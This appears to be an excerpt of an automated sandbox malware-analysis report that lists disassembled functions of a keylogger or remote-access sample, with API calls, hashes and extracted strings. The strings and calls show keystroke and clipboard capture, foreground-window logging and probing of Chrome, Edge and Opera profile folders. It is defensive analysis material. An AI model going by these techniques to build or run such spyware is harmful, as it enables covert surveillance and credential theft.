                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • GetTimeZoneInformation.KERNEL32 ref: 02A493CF
                                      • WideCharToMultiByte.KERNEL32(00000000,?,02A72764,000000FF,?,0000003F,?,?), ref: 02A49447
                                      • WideCharToMultiByte.KERNEL32(00000000,?,02A727B8,000000FF,?,0000003F,?,?,?,02A72764,000000FF,?,0000003F,?,?), ref: 02A49474
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                      • String ID:
                                      • API String ID: 806657224-0
                                      • Opcode ID: 857bd42f98e8b09ae3213ad9d76c64b33232dc323df6aaaf7e7a3ce47fb2a132
                                      • Instruction ID: e39e29e4b648967b29232b598d99c972fa7b233206bbeab333f809aa2f6ed78b
                                      • Opcode Fuzzy Hash: 857bd42f98e8b09ae3213ad9d76c64b33232dc323df6aaaf7e7a3ce47fb2a132
                                      • Instruction Fuzzy Hash: 2531A470D44216DFCB11DF69DD8096BBBB8FF8576075446AAE4609B290DF30C925CB50
                                      Function 02A0A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A1C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A1C561
                                        • Part of subcall function 02A1C551: GetWindowTextLengthW.USER32(00000000), ref: 02A1C56A
                                        • Part of subcall function 02A1C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 02A1C594
                                      • Sleep.KERNEL32(000001F4), ref: 02A0A573
                                      • Sleep.KERNEL32(00000064), ref: 02A0A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$ForegroundLength
                                      • String ID: [ $ ]
                                      • API String ID: 3309952895-93608704
                                      • Opcode ID: e07feaeaf3f6ca88d561a2936b2e8eb270ea64372474cf5e9c8ef3f8aa38831f
                                      • Instruction ID: 44f2f428164117f6ff91953a4053d47ea7c9500e2bfa913b99d11c22afd5a8ec
                                      • Opcode Fuzzy Hash: e07feaeaf3f6ca88d561a2936b2e8eb270ea64372474cf5e9c8ef3f8aa38831f
                                      • Instruction Fuzzy Hash: 99119F315843005BC618BB64EED19AFB7BABF50710F40051EE656564E2FF61AE18CED2
                                      Function 02A43A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 270860a5f63311d4955aaccad06ff3d292f68178642bca00367de82a70de573b
                                      • Instruction ID: 2c27b7d56553800ce7e6e20c84b47792c0c4a7528422be3601827ba0f13f2fb0
                                      • Opcode Fuzzy Hash: 270860a5f63311d4955aaccad06ff3d292f68178642bca00367de82a70de573b
                                      • Instruction Fuzzy Hash: 5D018FB3A89316BEFA202A786CC0F67261DDBC17B9B380776B531611D0DFA1CC5149A0
                                      Function 02A43AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1827881455c00197c5bcb875a79a66c0dde9f4aa45af04208978ae4deff5d3e4
                                      • Instruction ID: b61e6541268b8c347f3e07f0f8ecd2f220abb07faf29be26732e1ab5d5cd2d04
                                      • Opcode Fuzzy Hash: 1827881455c00197c5bcb875a79a66c0dde9f4aa45af04208978ae4deff5d3e4
                                      • Instruction Fuzzy Hash: A001D6B2A49212BEEE112A786CC4E27625DDFC13B93340776F731511D4DF60CC0285A0
                                      Function 02A0A675 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02A0A74D), ref: 02A0A6AB
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,02A0A74D), ref: 02A0A6BA
                                      • Sleep.KERNEL32(00002710,?,?,?,02A0A74D), ref: 02A0A6E7
                                      • CloseHandle.KERNEL32(00000000,?,?,?,02A0A74D), ref: 02A0A6EE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSizeSleep
                                      • String ID:
                                      • API String ID: 1958988193-0
                                      • Opcode ID: 9b0977521b22a9ca221026d2cac70bfa0dd080bc4b8984f6e7b74d24563b11a1
                                      • Instruction ID: e074a0eeb0fa1d52e95f82ad821c627544fc4c5c7e3a48f93bd6ef5684bb4773
                                      • Opcode Fuzzy Hash: 9b0977521b22a9ca221026d2cac70bfa0dd080bc4b8984f6e7b74d24563b11a1
                                      • Instruction Fuzzy Hash: 29110D30E80350EEE631A764B8E4A5F7B7ABB41355F440818F382476C3CF61E869C759
                                      Function 02A1C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C49E
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C4B2
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C4D7
                                      • CloseHandle.KERNEL32(00000000,?,00000000,02A0412F,02A65E74), ref: 02A1C4E5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: b6e9e5418e59b01cdc53c18c8b9e16d864773875f72fd7dfe42ca97cb7a92d5a
                                      • Instruction ID: 6c30b443c95fe1b015157ee3d6406f8050ad7d79665d74e59141a8622835e6fb
                                      • Opcode Fuzzy Hash: b6e9e5418e59b01cdc53c18c8b9e16d864773875f72fd7dfe42ca97cb7a92d5a
                                      • Instruction Fuzzy Hash: 57F062B1685319BFE6105A25ACC9FBF375DEB867B4F00052EF902A61C0DF258D069572
                                      Function 02A1C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02A1C1F5
                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02A1C208
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02A1C233
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02A1C23B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcess
                                      • String ID:
                                      • API String ID: 39102293-0
                                      • Opcode ID: 66812e3efbb7439d394dd7e861cda51ffb4858e8ac9b6954e2f49618b405bb1c
                                      • Instruction ID: c18279a9df76a724185b85f1bd951a33d8284c1a06b5a0fb42dff85689e913db
                                      • Opcode Fuzzy Hash: 66812e3efbb7439d394dd7e861cda51ffb4858e8ac9b6954e2f49618b405bb1c
                                      • Instruction Fuzzy Hash: BA0126B16C0326ABD614A2949C89F77F37DEB84BB1F000096FA04D3180EF608C42C6B2
                                      Function 02A39863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 02A3987A
                                        • Part of subcall function 02A39EB2: ___AdjustPointer.LIBCMT ref: 02A39EFC
                                      • _UnwindNestedFrames.LIBCMT ref: 02A39891
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 02A398A3
                                      • CallCatchBlock.LIBVCRUNTIME ref: 02A398C7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0
                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction ID: 1bfc9fa20313919cde043e83364b86546372ee8958fca8a6b80670f688911891
                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction Fuzzy Hash: 5601D73200010ABBCF125F55CD40EDB3BBAEF99754F154154F95866120CBB6E461DFA1
                                      Function 02A193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemMetrics.USER32(0000004C), ref: 02A193F0
                                      • GetSystemMetrics.USER32(0000004D), ref: 02A193F6
                                      • GetSystemMetrics.USER32(0000004E), ref: 02A193FC
                                      • GetSystemMetrics.USER32(0000004F), ref: 02A19402
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MetricsSystem
                                      • String ID:
                                      • API String ID: 4116985748-0
                                      • Opcode ID: 43e1e3790ad495531060b1f57d4dd427babb8a436d60d11e4f502396c100add3
                                      • Instruction ID: 7bb2a23b5f3db8a82af42616d5704d3795e6c4d2a1be97a572744c3ba4b48769
                                      • Opcode Fuzzy Hash: 43e1e3790ad495531060b1f57d4dd427babb8a436d60d11e4f502396c100add3
                                      • Instruction Fuzzy Hash: D7F0AFA1F803164BD740EA759891A2F6BD6EBC4270F10083EE2098B281EEB4DC058B81
                                      Function 02A38F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 02A38F31
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 02A38F36
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02A38F3B
                                        • Part of subcall function 02A3A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02A3A44B
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02A38F50
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction ID: 21d0b356d83c1f2ca69e5fc21e9599a20299888551719925e038a6da2a298933
                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction Fuzzy Hash: 40C048190C06A15C2CA37BB023893AD03972D62B98BC0A4D7FCE0A70038F0E001AAD37
                                      Function 02A42C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                      Download Yara Rule
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 02A42CED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHandling__start
                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525
                                      • Opcode ID: 1dccb436a1513f15165a3ac0ab1e5f598e6e94c6c67079c3c444bea1d8247147
                                      • Instruction ID: 5fd262eeb68193c12479254bdc8b8cc6abd9340934d4aa12b2d421f59d610dd9
                                      • Opcode Fuzzy Hash: 1dccb436a1513f15165a3ac0ab1e5f598e6e94c6c67079c3c444bea1d8247147
                                      • Instruction Fuzzy Hash: 6B517D71E44B029ACB127B14CD8037A2BB4EBC0B50F204DA9F896C26D9EF35C4D5DE46
                                      Function 02A0404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02A04066
                                        • Part of subcall function 02A1B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,02A0407C), ref: 02A1B99F
                                        • Part of subcall function 02A18568: CloseHandle.KERNEL32(02A040F5,?,?,02A040F5,02A65E74), ref: 02A1857E
                                        • Part of subcall function 02A18568: CloseHandle.KERNEL32(02A65E74,?,?,02A040F5,02A65E74), ref: 02A18587
                                        • Part of subcall function 02A1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C49E
                                      • Sleep.KERNEL32(000000FA,02A65E74), ref: 02A04138
                                      Strings
                                      • /sort "Visit Time" /stext ", xrefs: 02A040B2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                      • String ID: /sort "Visit Time" /stext "
                                      • API String ID: 368326130-1573945896
                                      • Opcode ID: 44d9aa90fea760698bc2b59c5efd43976ae3da063e06e02d055cd067993191d6
                                      • Instruction ID: 41ec457c249c34f77f747517ab7cc03806ba688228ec6f20295a83826e4b622e
                                      • Opcode Fuzzy Hash: 44d9aa90fea760698bc2b59c5efd43976ae3da063e06e02d055cd067993191d6
                                      • Instruction Fuzzy Hash: 7D315E31A802185ADB15FAB4FDD59EEB37BAF94310F40006AE50AA71D4EF205D4ACE91
                                      Function 02A0B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A34770: __onexit.LIBCMT ref: 02A34776
                                      • __Init_thread_footer.LIBCMT ref: 02A0B797
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                      • API String ID: 1881088180-3686566968
                                      • Opcode ID: de58a8431a7acac76e3ed68cedc7a7c194e9b99ac49449e123b3f909ab0e9d23
                                      • Instruction ID: 4eb4a79f4c8cd56eb33e8308318a1fd14d11391fca7e20ab38a2805ebc869ad1
                                      • Opcode Fuzzy Hash: de58a8431a7acac76e3ed68cedc7a7c194e9b99ac49449e123b3f909ab0e9d23
                                      • Instruction Fuzzy Hash: 862193319902049BCB18FB64FED1EEDB37AAF54714F50096AD50A531D1EF306D4ACEA4
                                      Function 02A51B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetACP.KERNEL32(?,20001004,?,00000002), ref: 02A51C12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ACP$OCP
                                      • API String ID: 0-711371036
                                      • Opcode ID: 09c83c667716141a7c8be9006bc86379a734313e545b4bb237a4e7b382d8781e
                                      • Instruction ID: 9df7eb05c907df32653d4688c2cbc19db47b89b4f623109f45677e93ef7facb3
                                      • Opcode Fuzzy Hash: 09c83c667716141a7c8be9006bc86379a734313e545b4bb237a4e7b382d8781e
                                      • Instruction Fuzzy Hash: ED21B362A44520A7DB24CB6CC981BBB72AAEB54B69F478564EE0ED7500FF32DD40C390
                                      Function 02A04FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?,02A75598,?,00000000,?,?,?,?,?,?,02A15CC9,?,00000001,0000004C,00000000), ref: 02A05030
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • GetLocalTime.KERNEL32(?,02A75598,?,00000000,?,?,?,?,?,?,02A15CC9,?,00000001,0000004C,00000000), ref: 02A05087
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 02A0501F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 481472006-1507639952
                                      • Opcode ID: 3df4b75628319471be72dcde71f81cca37e6529839b240178cc4b43442b9450d
                                      • Instruction ID: 4fa15c72152c729fbc9c3c79efceda260bfebf2b97d517e030454d0c7cff791e
                                      • Opcode Fuzzy Hash: 3df4b75628319471be72dcde71f81cca37e6529839b240178cc4b43442b9450d
                                      • Instruction Fuzzy Hash: F6210E61D843805FD700BB34E989B7FBBA9AB56318F880C1ADC4507185DF29962DCFE6
                                      Function 02A1B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: | $%02i:%02i:%02i:%03i
                                      • API String ID: 481472006-2430845779
                                      • Opcode ID: 060c5080151cc9b4e594f51070c75e83b275956fce92ce399f7aeda1838f42ca
                                      • Instruction ID: 5a13bb0f160a45c27711d7b90c775801d5401ab438acbbd7f2d28fe809f1d665
                                      • Opcode Fuzzy Hash: 060c5080151cc9b4e594f51070c75e83b275956fce92ce399f7aeda1838f42ca
                                      • Instruction Fuzzy Hash: 5C1190714482045AC304EB61E9949FFB3EAAB48704F400D2FF89A820D0EF38DA49CA66
                                      Function 02A0B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,02A750F0), ref: 02A0B172
                                        • Part of subcall function 02A0B164: wsprintfW.USER32 ref: 02A0B1F3
                                        • Part of subcall function 02A1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02A1B509
                                      • CloseHandle.KERNEL32(?), ref: 02A0B0B4
                                      • UnhookWindowsHookEx.USER32 ref: 02A0B0C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                      • String ID: Online Keylogger Stopped
                                      • API String ID: 1623830855-1496645233
                                      • Opcode ID: aacedf093519ed8286d19239cd03ca53f491b9284ce147614d6b66cc625f1b03
                                      • Instruction ID: c7889188e6a91398fc56f5ec5fdc8ad619d6b1aaded281df247c00be05a92a13
                                      • Opcode Fuzzy Hash: aacedf093519ed8286d19239cd03ca53f491b9284ce147614d6b66cc625f1b03
                                      • Instruction Fuzzy Hash: 79012830A403049BD7217F34EA8AB7E7BB6AB41314F40089DD546065C5EF611856CFE2
                                      Function 02A0C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02A0C4F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                      • API String ID: 1174141254-4188645398
                                      • Opcode ID: 7e2c57147a3300a3ef2ea550b778ca84d48f86678f6a5265492a8ee5b107459e
                                      • Instruction ID: cbb65ec62170def415dab1ef63382714319937b8b6d39246ec2572d506e4fff4
                                      • Opcode Fuzzy Hash: 7e2c57147a3300a3ef2ea550b778ca84d48f86678f6a5265492a8ee5b107459e
                                      • Instruction Fuzzy Hash: 7EF08231980219A69B04B7F4FECA8FF7B3EAD14B11B400157A606A31C1EF609D05CAE1
                                      Function 02A0C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 02A0C5BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: AppData$\Opera Software\Opera Stable\
                                      • API String ID: 1174141254-1629609700
                                      • Opcode ID: a470a66a7360c757a1df2e839c15550999219c4c3ec0f0e60c34ea6ed7785030
                                      • Instruction ID: ec63bbce14d1315e65f1202079d254921cf6f6403175371dddf137b11a29a60a
                                      • Opcode Fuzzy Hash: a470a66a7360c757a1df2e839c15550999219c4c3ec0f0e60c34ea6ed7785030
                                      • Instruction Fuzzy Hash: 55F082319C0319A69B14F7B4EECACFF7B7EAD14B11B400157A606A20C1EF609D45CAE1
                                      Function 02A0C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02A0C559
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                      • API String ID: 1174141254-2800177040
                                      • Opcode ID: db28f8b2e40d9a8bdae7f30d1065f5002a4320b2e1a82cdcb9c8e0ee17b72e35
                                      • Instruction ID: c33dc9e5d4c973d3fc7ca4ccb5639144bcabf4734794c93e42a26894c33e913b
                                      • Opcode Fuzzy Hash: db28f8b2e40d9a8bdae7f30d1065f5002a4320b2e1a82cdcb9c8e0ee17b72e35
                                      • Instruction Fuzzy Hash: 6AF08231D80319A69B14B7B5FECA8FF7B7EAD14B11B000557A606A21C1EF609D45CAE1
                                      Function 02A0B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 02A0B64B
                                        • Part of subcall function 02A0A3E0: GetForegroundWindow.USER32 ref: 02A0A416
                                        • Part of subcall function 02A0A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 02A0A422
                                        • Part of subcall function 02A0A3E0: GetKeyboardLayout.USER32(00000000), ref: 02A0A429
                                        • Part of subcall function 02A0A3E0: GetKeyState.USER32(00000010), ref: 02A0A433
                                        • Part of subcall function 02A0A3E0: GetKeyboardState.USER32(?), ref: 02A0A43E
                                        • Part of subcall function 02A0A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02A0A461
                                        • Part of subcall function 02A0A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02A0A4C1
                                        • Part of subcall function 02A0A636: SetEvent.KERNEL32(?,?,00000000,02A0B20A,00000000), ref: 02A0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                      • String ID: [AltL]$[AltR]
                                      • API String ID: 2738857842-2658077756
                                      • Opcode ID: 9261445c61a992449765a265109e06fe6170b8d004f3f9f8cbf3906b9a81cc74
                                      • Instruction ID: 715b228961df2f7ac8b6aa43ceb7bf3f1b642cbe7b0c0f513d0bc969643aa0c0
                                      • Opcode Fuzzy Hash: 9261445c61a992449765a265109e06fe6170b8d004f3f9f8cbf3906b9a81cc74
                                      • Instruction Fuzzy Hash: A9E09B3278031067982C377D7BEE7BE2E568742B54F81054DE9434B6C5DE9E4D1147D2
                                      Function 02A0B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyState.USER32(00000012), ref: 02A0B6A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State
                                      • String ID: [CtrlL]$[CtrlR]
                                      • API String ID: 1649606143-2446555240
                                      • Opcode ID: aecc9d2c6092d1521feb7677b419dac616e774bf1c4cd26e371153a40aeb283c
                                      • Instruction ID: a1e15b1a43e61fa4a2e96e5615efab55b830c914d37e90a89cf4d279c383af98
                                      • Opcode Fuzzy Hash: aecc9d2c6092d1521feb7677b419dac616e774bf1c4cd26e371153a40aeb283c
                                      • Instruction Fuzzy Hash: 33E08622B4031053952837BD77DE77D2E159B42B68F41094DF8438B6C9DE66891147D2
                                      Function 02A13A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                      Download Yara Rule
                                      APIs
